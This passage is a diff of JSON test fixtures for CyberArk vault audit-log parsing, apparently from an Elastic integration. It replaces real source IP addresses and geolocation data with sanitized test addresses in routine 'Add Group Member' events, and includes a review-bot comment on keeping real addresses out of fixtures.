@@ -208,20 +172,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -238,7 +190,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -246,7 +198,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T17:58:01Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Group Member", "target_user": "Administrator", "source_user": "PSMMaster", 
@@ -262,8 +214,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730035100Z", - "original": "\u003c5\u003e1 2021-03-10T17:58:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:01\",\"IsoTimestamp\":\"2021-03-10T17:58:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577481900Z", + "original": "\u003c5\u003e1 2021-03-10T17:58:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:01\",\"IsoTimestamp\":\"2021-03-10T17:58:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } 
@@ -275,20 +227,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -305,7 +245,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -313,7 +253,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T17:59:29Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Group Member", "target_user": "PSMApp_VAGRANT", "source_user": "PSMAppUsers", 
@@ -329,8 +269,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730038300Z", - "original": "\u003c5\u003e1 2021-03-10T17:59:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:29\",\"IsoTimestamp\":\"2021-03-10T17:59:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMApp_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577487200Z", + "original": "\u003c5\u003e1 2021-03-10T17:59:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:29\",\"IsoTimestamp\":\"2021-03-10T17:59:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMApp_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } 
@@ -342,20 +282,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -372,7 +300,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -380,7 +308,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T17:59:30Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Group Member", "target_user": "PSMGw_VAGRANT", "source_user": "PVWAGWAccounts", 
@@ -396,8 +324,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730041500Z", - "original": "\u003c5\u003e1 2021-03-10T17:59:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:30\",\"IsoTimestamp\":\"2021-03-10T17:59:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMGw_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577492900Z", + "original": "\u003c5\u003e1 2021-03-10T17:59:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:30\",\"IsoTimestamp\":\"2021-03-10T17:59:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMGw_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } 
@@ -409,19 +337,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -438,7 +355,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -446,7 +363,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T22:17:15Z", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Add Group Member", "target_user": "Administrator", "source_user": "PSMMaster", 
@@ -462,8 +379,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730044700Z", - "original": "\u003c5\u003e1 2021-03-10T22:17:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:15\",\"IsoTimestamp\":\"2021-03-10T22:17:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577498200Z", + "original": "\u003c5\u003e1 2021-03-10T22:17:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:15\",\"IsoTimestamp\":\"2021-03-10T22:17:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } 
@@ -475,19 +392,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -504,7 +410,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -512,7 +418,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T22:19:16Z", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Add Group Member", "target_user": "PSMApp_ASR-WIN", "source_user": "PSMAppUsers", 
@@ -528,8 +434,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730047700Z", - "original": "\u003c5\u003e1 2021-03-10T22:19:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:16\",\"IsoTimestamp\":\"2021-03-10T22:19:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMApp_ASR-WIN\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577503500Z", + "original": "\u003c5\u003e1 2021-03-10T22:19:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:16\",\"IsoTimestamp\":\"2021-03-10T22:19:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMApp_ASR-WIN\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } 
@@ -541,19 +447,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -570,7 +465,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -578,7 +473,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T22:19:16Z", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Add Group Member", "target_user": "PSMGw_ASR-WIN", "source_user": "PVWAGWAccounts", 
@@ -594,8 +489,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730050900Z", - "original": "\u003c5\u003e1 2021-03-10T22:19:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:16\",\"IsoTimestamp\":\"2021-03-10T22:19:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMGw_ASR-WIN\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577508700Z", + "original": "\u003c5\u003e1 2021-03-10T22:19:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:16\",\"IsoTimestamp\":\"2021-03-10T22:19:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMGw_ASR-WIN\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } 
@@ -607,20 +502,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -637,7 +520,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { 
@@ -645,8 +528,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T16:59:38Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPApp_VAGRANT\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group 
Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPApp_VAGRANT\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add Group Member", "target_user": "PSMPApp_VAGRANT", "source_user": "PSMAppUsers", 
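Review bot: The sanitized station address has to be substituted in three separate places per document — `cyberarkpas.audit.station`, the XML inside `cyberarkpas.audit.raw`, and `event.original` — and this hunk does so consistently, but nothing prevents a real address from reappearing in one of them the next time a fixture is captured from a live vault. A lightweight guard, such as a fixture lint that rejects IPv4 literals outside the ranges the test GeoIP database supports, would catch that before merge rather than in a later cleanup like this one. Since `raw` repeats the entire audit record already preserved in `event.original`, that triplication is pre-existing behavior and not something this change introduces, but it is the reason the per-event substitution is error-prone.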
@@ -662,8 +545,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730054200Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPApp_VAGRANT\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:38\",\"IsoTimestamp\":\"2021-03-11T16:59:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group 
Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577514100Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPApp_VAGRANT\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
08:59:38\",\"IsoTimestamp\":\"2021-03-11T16:59:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -675,20 +558,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -705,7 +576,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { 
@@ -713,8 +584,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T16:59:38Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPGW_VAGRANT\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group 
